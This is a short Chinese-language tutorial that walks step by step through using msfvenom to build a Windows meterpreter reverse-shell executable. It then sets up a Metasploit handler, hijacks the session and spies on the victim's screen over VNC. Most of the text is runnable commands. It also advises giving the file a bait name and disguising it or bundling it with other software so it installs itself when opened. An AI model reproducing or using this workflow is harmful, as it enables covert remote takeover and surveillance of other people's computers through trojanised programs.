目录
一、前提:
安装虚拟机,在虚拟机安装Windows系统和kali系统。
软件:msfvenom、msfconsole(Kali系统内置)
二、过程:
1、进入管理员模式:
sudo su
执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可
2.生成可执行文件
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。
文件名可以随便写自己喜欢的名字。可以写个容易让目标主机上钩的名字。
当然MSF也可以用来渗透手机、mac、Linux等
这个就是Kali主机的IP地址
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
3.运行msfconsole命令
命令:
msfconsole
4.配置参数
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击
5.在靶机打开可执行文件
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
6.查看用户
(1)命令: sessions(查看上钩的用户)
(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
出现meterpreter你就已经成功的入侵的对方的电脑
7.监控靶机电脑屏幕
命令:
run vnc -i